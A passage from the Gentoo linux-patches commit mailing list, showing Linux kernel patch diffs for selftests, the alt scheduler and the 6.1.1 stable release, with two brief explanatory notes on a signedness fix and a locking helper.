+-ip netns exec ${NS5} ip -6 route add fd00::3 encap seg6local action End.BPF endpoint obj test_lwt_seg6local.o sec inspect_t dev veth8
++ip netns exec ${NS5} ip -6 route add fd00::3 encap seg6local action End.BPF endpoint obj ${BPF_FILE} sec inspect_t dev veth8
+ 
+ ip netns exec ${NS6} ip -6 addr add fb00::6/16 dev lo
+ ip netns exec ${NS6} ip -6 addr add fd00::4/16 dev lo
+diff --git a/tools/testing/selftests/bpf/test_tc_edt.sh b/tools/testing/selftests/bpf/test_tc_edt.sh
+index daa7d1b8d3092..76f0bd17061f9 100755
+--- a/tools/testing/selftests/bpf/test_tc_edt.sh
++++ b/tools/testing/selftests/bpf/test_tc_edt.sh
+@@ -5,6 +5,7 @@
+ # with dst port = 9000 down to 5MBps. Then it measures actual
+ # throughput of the flow.
+ 
++BPF_FILE="test_tc_edt.bpf.o"
+ if [[ $EUID -ne 0 ]]; then
+ 	echo "This script must be run as root"
+ 	echo "FAIL"
+@@ -54,7 +55,7 @@ ip -netns ${NS_DST} route add ${IP_SRC}/32  dev veth_dst
+ ip netns exec ${NS_SRC} tc qdisc add dev veth_src root fq
+ ip netns exec ${NS_SRC} tc qdisc add dev veth_src clsact
+ ip netns exec ${NS_SRC} tc filter add dev veth_src egress \
+-	bpf da obj test_tc_edt.o sec cls_test
++	bpf da obj ${BPF_FILE} sec cls_test
+ 
+ 
+ # start the listener
+diff --git a/tools/testing/selftests/bpf/test_tc_tunnel.sh b/tools/testing/selftests/bpf/test_tc_tunnel.sh
+index 088fcad138c98..334bdfeab9403 100755
+--- a/tools/testing/selftests/bpf/test_tc_tunnel.sh
++++ b/tools/testing/selftests/bpf/test_tc_tunnel.sh
+@@ -3,6 +3,7 @@
+ #
+ # In-place tunneling
+ 
++BPF_FILE="test_tc_tunnel.bpf.o"
+ # must match the port that the bpf program filters on
+ readonly port=8000
+ 
+@@ -196,7 +197,7 @@ verify_data
+ # client can no longer connect
+ ip netns exec "${ns1}" tc qdisc add dev veth1 clsact
+ ip netns exec "${ns1}" tc filter add dev veth1 egress \
+-	bpf direct-action object-file ./test_tc_tunnel.o \
++	bpf direct-action object-file ${BPF_FILE} \
+ 	section "encap_${tuntype}_${mac}"
+ echo "test bpf encap without decap (expect failure)"
+ server_listen
+@@ -296,7 +297,7 @@ fi
+ ip netns exec "${ns2}" ip link del dev testtun0
+ ip netns exec "${ns2}" tc qdisc add dev veth2 clsact
+ ip netns exec "${ns2}" tc filter add dev veth2 ingress \
+-	bpf direct-action object-file ./test_tc_tunnel.o section decap
++	bpf direct-action object-file ${BPF_FILE} section decap
+ echo "test bpf encap with bpf decap"
+ client_connect
+ verify_data
+diff --git a/tools/testing/selftests/bpf/test_tunnel.sh b/tools/testing/selftests/bpf/test_tunnel.sh
+index e9ebc67d73f70..2eaedc1d9ed30 100755
+--- a/tools/testing/selftests/bpf/test_tunnel.sh
++++ b/tools/testing/selftests/bpf/test_tunnel.sh
+@@ -45,6 +45,7 @@
+ # 5) Tunnel protocol handler, ex: vxlan_rcv, decap the packet
+ # 6) Forward the packet to the overlay tnl dev
+ 
++BPF_FILE="test_tunnel_kern.bpf.o"
+ BPF_PIN_TUNNEL_DIR="/sys/fs/bpf/tc/tunnel"
+ PING_ARG="-c 3 -w 10 -q"
+ ret=0
+@@ -545,7 +546,7 @@ test_xfrm_tunnel()
+ 	> /sys/kernel/debug/tracing/trace
+ 	setup_xfrm_tunnel
+ 	mkdir -p ${BPF_PIN_TUNNEL_DIR}
+-	bpftool prog loadall ./test_tunnel_kern.o ${BPF_PIN_TUNNEL_DIR}
++	bpftool prog loadall ${BPF_FILE} ${BPF_PIN_TUNNEL_DIR}
+ 	tc qdisc add dev veth1 clsact
+ 	tc filter add dev veth1 proto ip ingress bpf da object-pinned \
+ 		${BPF_PIN_TUNNEL_DIR}/xfrm_get_state
+@@ -572,7 +573,7 @@ attach_bpf()
+ 	SET=$2
+ 	GET=$3
+ 	mkdir -p ${BPF_PIN_TUNNEL_DIR}
+-	bpftool prog loadall ./test_tunnel_kern.o ${BPF_PIN_TUNNEL_DIR}/
++	bpftool prog loadall ${BPF_FILE} ${BPF_PIN_TUNNEL_DIR}/
+ 	tc qdisc add dev $DEV clsact
+ 	tc filter add dev $DEV egress bpf da object-pinned ${BPF_PIN_TUNNEL_DIR}/$SET
+ 	tc filter add dev $DEV ingress bpf da object-pinned ${BPF_PIN_TUNNEL_DIR}/$GET
+diff --git a/tools/testing/selftests/bpf/test_xdp_meta.sh b/tools/testing/selftests/bpf/test_xdp_meta.sh
+index ea69370caae30..2740322c1878b 100755
+--- a/tools/testing/selftests/bpf/test_xdp_meta.sh
++++ b/tools/testing/selftests/bpf/test_xdp_meta.sh
+@@ -1,5 +1,6 @@
+ #!/bin/sh
+ 
++BPF_FILE="test_xdp_meta.bpf.o"
+ # Kselftest framework requirement - SKIP code is 4.
+ readonly KSFT_SKIP=4
+ readonly NS1="ns1-$(mktemp -u XXXXXX)"
+@@ -42,11 +43,11 @@ ip netns exec ${NS2} ip addr add 10.1.1.22/24 dev veth2
+ ip netns exec ${NS1} tc qdisc add dev veth1 clsact
+ ip netns exec ${NS2} tc qdisc add dev veth2 clsact
+ 
+-ip netns exec ${NS1} tc filter add dev veth1 ingress bpf da obj test_xdp_meta.o sec t
+-ip netns exec ${NS2} tc filter add dev veth2 ingress bpf da obj test_xdp_meta.o sec t
++ip netns exec ${NS1} tc filter add dev veth1 ingress bpf da obj ${BPF_FILE} sec t
++ip netns exec ${NS2} tc filter add dev veth2 ingress bpf da obj ${BPF_FILE} sec t
+ 
+-ip netns exec ${NS1} ip link set dev veth1 xdp obj test_xdp_meta.o sec x
+-ip netns exec ${NS2} ip link set dev veth2 xdp obj test_xdp_meta.o sec x
++ip netns exec ${NS1} ip link set dev veth1 xdp obj ${BPF_FILE} sec x
++ip netns exec ${NS2} ip link set dev veth2 xdp obj ${BPF_FILE} sec x
+ 
+ ip netns exec ${NS1} ip link set dev veth1 up
+ ip netns exec ${NS2} ip link set dev veth2 up
+diff --git a/tools/testing/selftests/bpf/test_xdp_vlan.sh b/tools/testing/selftests/bpf/test_xdp_vlan.sh
+index 810c407e0286e..fbcaa9f0120b2 100755
+--- a/tools/testing/selftests/bpf/test_xdp_vlan.sh
++++ b/tools/testing/selftests/bpf/test_xdp_vlan.sh
+@@ -200,11 +200,11 @@ ip netns exec ${NS2} sh -c 'ping -W 1 -c 1 100.64.41.1 || echo "Success: First p
+ # ----------------------------------------------------------------------
+ # In ns1: ingress use XDP to remove VLAN tags
+ export DEVNS1=veth1
+-export FILE=test_xdp_vlan.o
++export BPF_FILE=test_xdp_vlan.bpf.o
+ 
+ # First test: Remove VLAN by setting VLAN ID 0, using "xdp_vlan_change"
+ export XDP_PROG=xdp_vlan_change
+-ip netns exec ${NS1} ip link set $DEVNS1 $XDP_MODE object $FILE section $XDP_PROG
++ip netns exec ${NS1} ip link set $DEVNS1 $XDP_MODE object $BPF_FILE section $XDP_PROG
+ 
+ # In ns1: egress use TC to add back VLAN tag 4011
+ #  (del cmd)
+@@ -212,7 +212,7 @@ ip netns exec ${NS1} ip link set $DEVNS1 $XDP_MODE object $FILE section $XDP_PRO
+ #
+ ip netns exec ${NS1} tc qdisc add dev $DEVNS1 clsact
+ ip netns exec ${NS1} tc filter add dev $DEVNS1 egress \
+-  prio 1 handle 1 bpf da obj $FILE sec tc_vlan_push
++  prio 1 handle 1 bpf da obj $BPF_FILE sec tc_vlan_push
+ 
+ # Now the namespaces can reach each-other, test with ping:
+ ip netns exec ${NS2} ping -i 0.2 -W 2 -c 2 $IPADDR1
+@@ -226,7 +226,7 @@ ip netns exec ${NS1} ping -i 0.2 -W 2 -c 2 $IPADDR2
+ #
+ export XDP_PROG=xdp_vlan_remove_outer2
+ ip netns exec ${NS1} ip link set $DEVNS1 $XDP_MODE off
+-ip netns exec ${NS1} ip link set $DEVNS1 $XDP_MODE object $FILE section $XDP_PROG
++ip netns exec ${NS1} ip link set $DEVNS1 $XDP_MODE object $BPF_FILE section $XDP_PROG
+ 
+ # Now the namespaces should still be able reach each-other, test with ping:
+ ip netns exec ${NS2} ping -i 0.2 -W 2 -c 2 $IPADDR1
+diff --git a/tools/testing/selftests/bpf/xdp_synproxy.c b/tools/testing/selftests/bpf/xdp_synproxy.c
+index ff35320d2be97..410a1385a01dd 100644
+--- a/tools/testing/selftests/bpf/xdp_synproxy.c
++++ b/tools/testing/selftests/bpf/xdp_synproxy.c
+@@ -104,7 +104,8 @@ static void parse_options(int argc, char *argv[], unsigned int *ifindex, __u32 *
+ 		{ "tc", no_argument, NULL, 'c' },
+ 		{ NULL, 0, NULL, 0 },
+ 	};
+-	unsigned long mss4, mss6, wscale, ttl;
++	unsigned long mss4, wscale, ttl;
++	unsigned long long mss6;
+ 	unsigned int tcpipopts_mask = 0;
+ 
+ 	if (argc < 2)
+@@ -286,7 +287,7 @@ static int syncookie_open_bpf_maps(__u32 prog_id, int *values_map_fd, int *ports
+ 
+ 	prog_info = (struct bpf_prog_info) {
+ 		.nr_map_ids = 8,
+-		.map_ids = (__u64)map_ids,
++		.map_ids = (__u64)(unsigned long)map_ids,
+ 	};
+ 	info_len = sizeof(prog_info);
+ 
+diff --git a/tools/testing/selftests/cgroup/cgroup_util.c b/tools/testing/selftests/cgroup/cgroup_util.c
+index 4c52cc6f2f9cc..e8bbbdb77e0d5 100644
+--- a/tools/testing/selftests/cgroup/cgroup_util.c
++++ b/tools/testing/selftests/cgroup/cgroup_util.c
+@@ -555,6 +555,7 @@ int proc_mount_contains(const char *option)
+ ssize_t proc_read_text(int pid, bool thread, const char *item, char *buf, size_t size)
+ {
+ 	char path[PATH_MAX];
++	ssize_t ret;
+ 
+ 	if (!pid)
+ 		snprintf(path, sizeof(path), "/proc/%s/%s",
+@@ -562,8 +563,8 @@ ssize_t proc_read_text(int pid, bool thread, const char *item, char *buf, size_t
+ 	else
+ 		snprintf(path, sizeof(path), "/proc/%d/%s", pid, item);
+ 
+-	size = read_text(path, buf, size);
+-	return size < 0 ? -1 : size;
++	ret = read_text(path, buf, size);
++	return ret < 0 ? -1 : ret;
+ }
+ 
+ int proc_read_strstr(int pid, bool thread, const char *item, const char *needle)
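
The cgroup_util.c hunk fixes a signedness bug: read_text() returns a negative value on error, but storing it into the unsigned size_t parameter made "size < 0" always false, turning errors into huge positive lengths. A minimal sketch of why the separate ssize_t matters:

#include <stdio.h>
#include <sys/types.h>

static ssize_t read_text_stub(char *buf, size_t size)
{
	(void)buf;
	(void)size;
	return -1;                    /* simulate a read failure */
}

int main(void)
{
	char buf[64];
	size_t size = sizeof(buf);
	ssize_t ret;

	size = read_text_stub(buf, size);        /* old pattern: sign lost */
	printf("size < 0 is %d (error became %zu)\n",
	       size < 0, size);                  /* always 0: size is unsigned */

	ret = read_text_stub(buf, sizeof(buf));  /* fixed pattern */
	printf("ret < 0 is %d\n", ret < 0);      /* 1: error detected */
	return 0;
}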
+diff --git a/tools/testing/selftests/drivers/net/netdevsim/devlink.sh b/tools/testing/selftests/drivers/net/netdevsim/devlink.sh
+index 9de1d123f4f5d..a08c02abde121 100755
+--- a/tools/testing/selftests/drivers/net/netdevsim/devlink.sh
++++ b/tools/testing/selftests/drivers/net/netdevsim/devlink.sh
+@@ -496,8 +496,8 @@ dummy_reporter_test()
+ 
+ 	check_reporter_info dummy healthy 3 3 10 true
+ 
+-	echo 8192> $DEBUGFS_DIR/health/binary_len
+-	check_fail $? "Failed set dummy reporter binary len to 8192"
++	echo 8192 > $DEBUGFS_DIR/health/binary_len
++	check_err $? "Failed set dummy reporter binary len to 8192"
+ 
+ 	local dump=$(devlink health dump show $DL_HANDLE reporter dummy -j)
+ 	check_err $? "Failed show dump of dummy reporter"
+diff --git a/tools/testing/selftests/efivarfs/efivarfs.sh b/tools/testing/selftests/efivarfs/efivarfs.sh
+index a90f394f9aa90..d374878cc0ba9 100755
+--- a/tools/testing/selftests/efivarfs/efivarfs.sh
++++ b/tools/testing/selftests/efivarfs/efivarfs.sh
+@@ -87,6 +87,11 @@ test_create_read()
+ {
+ 	local file=$efivarfs_mount/$FUNCNAME-$test_guid
+ 	./create-read $file
++	if [ $? -ne 0 ]; then
++		echo "create and read $file failed"
++		file_cleanup $file
++		exit 1
++	fi
+ 	file_cleanup $file
+ }
+ 
+diff --git a/tools/testing/selftests/ftrace/test.d/ftrace/func_event_triggers.tc b/tools/testing/selftests/ftrace/test.d/ftrace/func_event_triggers.tc
+index 8d26d5505808b..3eea2abf68f9e 100644
+--- a/tools/testing/selftests/ftrace/test.d/ftrace/func_event_triggers.tc
++++ b/tools/testing/selftests/ftrace/test.d/ftrace/func_event_triggers.tc
+@@ -38,11 +38,18 @@ cnt_trace() {
+ 
+ test_event_enabled() {
+     val=$1
++    check_times=10		# wait for 10 * SLEEP_TIME at most
+ 
+-    e=`cat $EVENT_ENABLE`
+-    if [ "$e" != $val ]; then
+-	fail "Expected $val but found $e"
+-    fi
++    while [ $check_times -ne 0 ]; do
++	e=`cat $EVENT_ENABLE`
++	if [ "$e" == $val ]; then
++	    return 0
++	fi
++	sleep $SLEEP_TIME
++	check_times=$((check_times - 1))
++    done
++
++    fail "Expected $val but found $e"
+ }
+ 
+ run_enable_disable() {
+diff --git a/tools/testing/selftests/netfilter/conntrack_icmp_related.sh b/tools/testing/selftests/netfilter/conntrack_icmp_related.sh
+index b48e1833bc896..76645aaf2b58f 100755
+--- a/tools/testing/selftests/netfilter/conntrack_icmp_related.sh
++++ b/tools/testing/selftests/netfilter/conntrack_icmp_related.sh
+@@ -35,6 +35,8 @@ cleanup() {
+ 	for i in 1 2;do ip netns del nsrouter$i;done
+ }
+ 
++trap cleanup EXIT
++
+ ipv4() {
+     echo -n 192.168.$1.2
+ }
+@@ -146,11 +148,17 @@ ip netns exec nsclient1 nft -f - <<EOF
+ table inet filter {
+ 	counter unknown { }
+ 	counter related { }
++	counter redir4 { }
++	counter redir6 { }
+ 	chain input {
+ 		type filter hook input priority 0; policy accept;
+-		meta l4proto { icmp, icmpv6 } ct state established,untracked accept
+ 
++		icmp type "redirect" ct state "related" counter name "redir4" accept
++		icmpv6 type "nd-redirect" ct state "related" counter name "redir6" accept
++
++		meta l4proto { icmp, icmpv6 } ct state established,untracked accept
+ 		meta l4proto { icmp, icmpv6 } ct state "related" counter name "related" accept
++
+ 		counter name "unknown" drop
+ 	}
+ }
+@@ -279,5 +287,29 @@ else
+ 	echo "ERROR: icmp error RELATED state test has failed"
+ fi
+ 
+-cleanup
++# add 'bad' route,  expect icmp REDIRECT to be generated
++ip netns exec nsclient1 ip route add 192.168.1.42 via 192.168.1.1
++ip netns exec nsclient1 ip route add dead:1::42 via dead:1::1
++
++ip netns exec "nsclient1" ping -q -c 2 192.168.1.42 > /dev/null
++
++expect="packets 1 bytes 112"
++check_counter nsclient1 "redir4" "$expect"
++if [ $? -ne 0 ];then
++	ret=1
++fi
++
++ip netns exec "nsclient1" ping -c 1 dead:1::42 > /dev/null
++expect="packets 1 bytes 192"
++check_counter nsclient1 "redir6" "$expect"
++if [ $? -ne 0 ];then
++	ret=1
++fi
++
++if [ $ret -eq 0 ];then
++	echo "PASS: icmp redirects had RELATED state"
++else
++	echo "ERROR: icmp redirect RELATED state test has failed"
++fi
++
+ exit $ret
+diff --git a/tools/testing/selftests/powerpc/dscr/dscr_sysfs_test.c b/tools/testing/selftests/powerpc/dscr/dscr_sysfs_test.c
+index fbbdffdb2e5d2..f20d1c166d1e4 100644
+--- a/tools/testing/selftests/powerpc/dscr/dscr_sysfs_test.c
++++ b/tools/testing/selftests/powerpc/dscr/dscr_sysfs_test.c
+@@ -24,6 +24,7 @@ static int check_cpu_dscr_default(char *file, unsigned long val)
+ 	rc = read(fd, buf, sizeof(buf));
+ 	if (rc == -1) {
+ 		perror("read() failed");
++		close(fd);
+ 		return 1;
+ 	}
+ 	close(fd);
+@@ -65,8 +66,10 @@ static int check_all_cpu_dscr_defaults(unsigned long val)
+ 		if (access(file, F_OK))
+ 			continue;
+ 
+-		if (check_cpu_dscr_default(file, val))
++		if (check_cpu_dscr_default(file, val)) {
++			closedir(sysfs);
+ 			return 1;
++		}
+ 	}
+ 	closedir(sysfs);
+ 	return 0;
+diff --git a/tools/testing/selftests/proc/proc-uptime-002.c b/tools/testing/selftests/proc/proc-uptime-002.c
+index e7ceabed7f51f..7d0aa22bdc12b 100644
+--- a/tools/testing/selftests/proc/proc-uptime-002.c
++++ b/tools/testing/selftests/proc/proc-uptime-002.c
+@@ -17,6 +17,7 @@
+ // while shifting across CPUs.
+ #undef NDEBUG
+ #include <assert.h>
++#include <errno.h>
+ #include <unistd.h>
+ #include <sys/syscall.h>
+ #include <stdlib.h>
+@@ -54,7 +55,7 @@ int main(void)
+ 		len += sizeof(unsigned long);
+ 		free(m);
+ 		m = malloc(len);
+-	} while (sys_sched_getaffinity(0, len, m) == -EINVAL);
++	} while (sys_sched_getaffinity(0, len, m) == -1 && errno == EINVAL);
+ 
+ 	fd = open("/proc/uptime", O_RDONLY);
+ 	assert(fd >= 0);

diff --git a/5021_sched-alt-missing-rq-lock-irq-function.patch b/5021_sched-alt-missing-rq-lock-irq-function.patch
new file mode 100644
index 00000000..04cca612
--- /dev/null
+++ b/5021_sched-alt-missing-rq-lock-irq-function.patch
@@ -0,0 +1,30 @@
+From 4157360d2e1cbdfb8065f151dbe057b17188a23f Mon Sep 17 00:00:00 2001
+From: Tor Vic <torvic9@mailbox.org>
+Date: Mon, 7 Nov 2022 15:11:54 +0100
+Subject: [PATCH] sched/alt: Add missing rq_lock_irq() function to header file
+
+---
+ kernel/sched/alt_sched.h | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
+index 93ff3bddd36f..a00bc84b93b2 100644
+--- a/kernel/sched/alt_sched.h
++++ b/kernel/sched/alt_sched.h
+@@ -387,6 +387,13 @@ task_rq_unlock(struct rq *rq, struct task_struct *p, struct rq_flags *rf)
+ 	raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
+ }
+ 
++static inline void
++rq_lock_irq(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	raw_spin_lock_irq(&rq->lock);
++}
++
+ static inline void
+ rq_lock(struct rq *rq, struct rq_flags *rf)
+ 	__acquires(rq->lock)
+-- 
+GitLab
+
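
For reference, rq_lock_irq() here mirrors the mainline scheduler helper of
the same name: it disables local interrupts and takes the run queue lock.
A minimal caller sketch (illustrative only, and assuming the same header
also provides a matching rq_unlock_irq() helper):

	static void example_inspect_rq(struct rq *rq)
	{
		struct rq_flags rf;

		rq_lock_irq(rq, &rf);	/* IRQs off, rq->lock held */
		/* ... read or update run queue state ... */
		rq_unlock_irq(rq, &rf);	/* rq->lock dropped, IRQs back on */
	}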


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2022-12-21 19:05 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2022-12-21 19:05 UTC (permalink / raw
  To: gentoo-commits

commit:     d9693e00e43bce95a9104cba1f4e710ba0918f36
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Wed Dec 21 18:56:47 2022 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Wed Dec 21 18:57:43 2022 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=d9693e00

Linux patch 6.1.1

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README            |    4 +
 1000_linux-6.1.1.patch | 1127 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 1131 insertions(+)

diff --git a/0000_README b/0000_README
index acaedd58..d85dd44f 100644
--- a/0000_README
+++ b/0000_README
@@ -43,6 +43,10 @@ EXPERIMENTAL
 Individual Patch Descriptions:
 --------------------------------------------------------------------------
 
+Patch:  1000_linux-6.1.1.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.1
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1000_linux-6.1.1.patch b/1000_linux-6.1.1.patch
new file mode 100644
index 00000000..391da5ed
--- /dev/null
+++ b/1000_linux-6.1.1.patch
@@ -0,0 +1,1127 @@
+diff --git a/Documentation/security/keys/trusted-encrypted.rst b/Documentation/security/keys/trusted-encrypted.rst
+index 0bfb4c3397489..9bc9db8ec6517 100644
+--- a/Documentation/security/keys/trusted-encrypted.rst
++++ b/Documentation/security/keys/trusted-encrypted.rst
+@@ -350,7 +350,8 @@ Load an encrypted key "evm" from saved blob::
+ 
+ Instantiate an encrypted key "evm" using user-provided decrypted data::
+ 
+-    $ keyctl add encrypted evm "new default user:kmk 32 `cat evm_decrypted_data.blob`" @u
++    $ evmkey=$(dd if=/dev/urandom bs=1 count=32 | xxd -c32 -p)
++    $ keyctl add encrypted evm "new default user:kmk 32 $evmkey" @u
+     794890253
+ 
+     $ keyctl print 794890253
+diff --git a/Makefile b/Makefile
+index 997b677222920..7307ae6c2ef72 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 0
++SUBLEVEL = 1
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/mips/include/asm/mach-ralink/mt7621.h b/arch/mips/include/asm/mach-ralink/mt7621.h
+index 6bbf082dd149e..79d5bb0e06d63 100644
+--- a/arch/mips/include/asm/mach-ralink/mt7621.h
++++ b/arch/mips/include/asm/mach-ralink/mt7621.h
+@@ -7,10 +7,12 @@
+ #ifndef _MT7621_REGS_H_
+ #define _MT7621_REGS_H_
+ 
++#define IOMEM(x)			((void __iomem *)(KSEG1ADDR(x)))
++
+ #define MT7621_PALMBUS_BASE		0x1C000000
+ #define MT7621_PALMBUS_SIZE		0x03FFFFFF
+ 
+-#define MT7621_SYSC_BASE		0x1E000000
++#define MT7621_SYSC_BASE		IOMEM(0x1E000000)
+ 
+ #define SYSC_REG_CHIP_NAME0		0x00
+ #define SYSC_REG_CHIP_NAME1		0x04
+diff --git a/arch/mips/ralink/mt7621.c b/arch/mips/ralink/mt7621.c
+index fb0565bc34fda..bbf5811afbf2c 100644
+--- a/arch/mips/ralink/mt7621.c
++++ b/arch/mips/ralink/mt7621.c
+@@ -25,6 +25,7 @@
+ #define MT7621_MEM_TEST_PATTERN         0xaa5555aa
+ 
+ static u32 detect_magic __initdata;
++static struct ralink_soc_info *soc_info_ptr;
+ 
+ int pcibios_root_bridge_prepare(struct pci_host_bridge *bridge)
+ {
+@@ -97,41 +98,83 @@ void __init ralink_of_remap(void)
+ 		panic("Failed to remap core resources");
+ }
+ 
+-static void soc_dev_init(struct ralink_soc_info *soc_info, u32 rev)
++static unsigned int __init mt7621_get_soc_name0(void)
++{
++	return __raw_readl(MT7621_SYSC_BASE + SYSC_REG_CHIP_NAME0);
++}
++
++static unsigned int __init mt7621_get_soc_name1(void)
++{
++	return __raw_readl(MT7621_SYSC_BASE + SYSC_REG_CHIP_NAME1);
++}
++
++static bool __init mt7621_soc_valid(void)
++{
++	if (mt7621_get_soc_name0() == MT7621_CHIP_NAME0 &&
++			mt7621_get_soc_name1() == MT7621_CHIP_NAME1)
++		return true;
++	else
++		return false;
++}
++
++static const char __init *mt7621_get_soc_id(void)
++{
++	if (mt7621_soc_valid())
++		return "MT7621";
++	else
++		return "invalid";
++}
++
++static unsigned int __init mt7621_get_soc_rev(void)
++{
++	return __raw_readl(MT7621_SYSC_BASE + SYSC_REG_CHIP_REV);
++}
++
++static unsigned int __init mt7621_get_soc_ver(void)
++{
++	return (mt7621_get_soc_rev() >> CHIP_REV_VER_SHIFT) & CHIP_REV_VER_MASK;
++}
++
++static unsigned int __init mt7621_get_soc_eco(void)
++{
++	return (mt7621_get_soc_rev() & CHIP_REV_ECO_MASK);
++}
++
++static const char __init *mt7621_get_soc_revision(void)
++{
++	if (mt7621_get_soc_rev() == 1 && mt7621_get_soc_eco() == 1)
++		return "E2";
++	else
++		return "E1";
++}
++
++static int __init mt7621_soc_dev_init(void)
+ {
+ 	struct soc_device *soc_dev;
+ 	struct soc_device_attribute *soc_dev_attr;
+ 
+ 	soc_dev_attr = kzalloc(sizeof(*soc_dev_attr), GFP_KERNEL);
+ 	if (!soc_dev_attr)
+-		return;
++		return -ENOMEM;
+ 
+ 	soc_dev_attr->soc_id = "mt7621";
+ 	soc_dev_attr->family = "Ralink";
++	soc_dev_attr->revision = mt7621_get_soc_revision();
+ 
+-	if (((rev >> CHIP_REV_VER_SHIFT) & CHIP_REV_VER_MASK) == 1 &&
+-	    (rev & CHIP_REV_ECO_MASK) == 1)
+-		soc_dev_attr->revision = "E2";
+-	else
+-		soc_dev_attr->revision = "E1";
+-
+-	soc_dev_attr->data = soc_info;
++	soc_dev_attr->data = soc_info_ptr;
+ 
+ 	soc_dev = soc_device_register(soc_dev_attr);
+ 	if (IS_ERR(soc_dev)) {
+ 		kfree(soc_dev_attr);
+-		return;
++		return PTR_ERR(soc_dev);
+ 	}
++
++	return 0;
+ }
++device_initcall(mt7621_soc_dev_init);
+ 
+ void __init prom_soc_init(struct ralink_soc_info *soc_info)
+ {
+-	void __iomem *sysc = (void __iomem *) KSEG1ADDR(MT7621_SYSC_BASE);
+-	unsigned char *name = NULL;
+-	u32 n0;
+-	u32 n1;
+-	u32 rev;
+-
+ 	/* Early detection of CMP support */
+ 	mips_cm_probe();
+ 	mips_cpc_probe();
+@@ -154,27 +197,23 @@ void __init prom_soc_init(struct ralink_soc_info *soc_info)
+ 		__sync();
+ 	}
+ 
+-	n0 = __raw_readl(sysc + SYSC_REG_CHIP_NAME0);
+-	n1 = __raw_readl(sysc + SYSC_REG_CHIP_NAME1);
+-
+-	if (n0 == MT7621_CHIP_NAME0 && n1 == MT7621_CHIP_NAME1) {
+-		name = "MT7621";
++	if (mt7621_soc_valid())
+ 		soc_info->compatible = "mediatek,mt7621-soc";
+-	} else {
+-		panic("mt7621: unknown SoC, n0:%08x n1:%08x\n", n0, n1);
+-	}
++	else
++		panic("mt7621: unknown SoC, n0:%08x n1:%08x\n",
++				mt7621_get_soc_name0(),
++				mt7621_get_soc_name1());
+ 	ralink_soc = MT762X_SOC_MT7621AT;
+-	rev = __raw_readl(sysc + SYSC_REG_CHIP_REV);
+ 
+ 	snprintf(soc_info->sys_type, RAMIPS_SYS_TYPE_LEN,
+ 		"MediaTek %s ver:%u eco:%u",
+-		name,
+-		(rev >> CHIP_REV_VER_SHIFT) & CHIP_REV_VER_MASK,
+-		(rev & CHIP_REV_ECO_MASK));
++		mt7621_get_soc_id(),
++		mt7621_get_soc_ver(),
++		mt7621_get_soc_eco());
+ 
+ 	soc_info->mem_detect = mt7621_memory_detect;
+ 
+-	soc_dev_init(soc_info, rev);
++	soc_info_ptr = soc_info;
+ 
+ 	if (!register_cps_smp_ops())
+ 		return;
+diff --git a/arch/x86/entry/vdso/vdso.lds.S b/arch/x86/entry/vdso/vdso.lds.S
+index 4bf48462fca7a..e8c60ae7a7c83 100644
+--- a/arch/x86/entry/vdso/vdso.lds.S
++++ b/arch/x86/entry/vdso/vdso.lds.S
+@@ -27,7 +27,9 @@ VERSION {
+ 		__vdso_time;
+ 		clock_getres;
+ 		__vdso_clock_getres;
++#ifdef CONFIG_X86_SGX
+ 		__vdso_sgx_enter_enclave;
++#endif
+ 	local: *;
+ 	};
+ }
+diff --git a/drivers/irqchip/irq-ls-extirq.c b/drivers/irqchip/irq-ls-extirq.c
+index d8d48b1f7c29d..139f26b0a6ef8 100644
+--- a/drivers/irqchip/irq-ls-extirq.c
++++ b/drivers/irqchip/irq-ls-extirq.c
+@@ -203,7 +203,7 @@ ls_extirq_of_init(struct device_node *node, struct device_node *parent)
+ 	if (ret)
+ 		goto err_parse_map;
+ 
+-	priv->big_endian = of_device_is_big_endian(parent);
++	priv->big_endian = of_device_is_big_endian(node->parent);
+ 	priv->is_ls1021a_or_ls1043a = of_device_is_compatible(node, "fsl,ls1021a-extirq") ||
+ 				      of_device_is_compatible(node, "fsl,ls1043a-extirq");
+ 	raw_spin_lock_init(&priv->lock);
+diff --git a/drivers/net/ethernet/intel/igb/igb_main.c b/drivers/net/ethernet/intel/igb/igb_main.c
+index f8e32833226c1..473158c09f1d7 100644
+--- a/drivers/net/ethernet/intel/igb/igb_main.c
++++ b/drivers/net/ethernet/intel/igb/igb_main.c
+@@ -7521,7 +7521,7 @@ static void igb_vf_reset_msg(struct igb_adapter *adapter, u32 vf)
+ {
+ 	struct e1000_hw *hw = &adapter->hw;
+ 	unsigned char *vf_mac = adapter->vf_data[vf].vf_mac_addresses;
+-	u32 reg, msgbuf[3];
++	u32 reg, msgbuf[3] = {};
+ 	u8 *addr = (u8 *)(&msgbuf[1]);
+ 
+ 	/* process all the same items cleared in a function level reset */
+diff --git a/drivers/pci/controller/pcie-mt7621.c b/drivers/pci/controller/pcie-mt7621.c
+index 4bd1abf26008f..ee7aad09d6277 100644
+--- a/drivers/pci/controller/pcie-mt7621.c
++++ b/drivers/pci/controller/pcie-mt7621.c
+@@ -466,7 +466,8 @@ static int mt7621_pcie_register_host(struct pci_host_bridge *host)
+ }
+ 
+ static const struct soc_device_attribute mt7621_pcie_quirks_match[] = {
+-	{ .soc_id = "mt7621", .revision = "E2" }
++	{ .soc_id = "mt7621", .revision = "E2" },
++	{ /* sentinel */ }
+ };
+ 
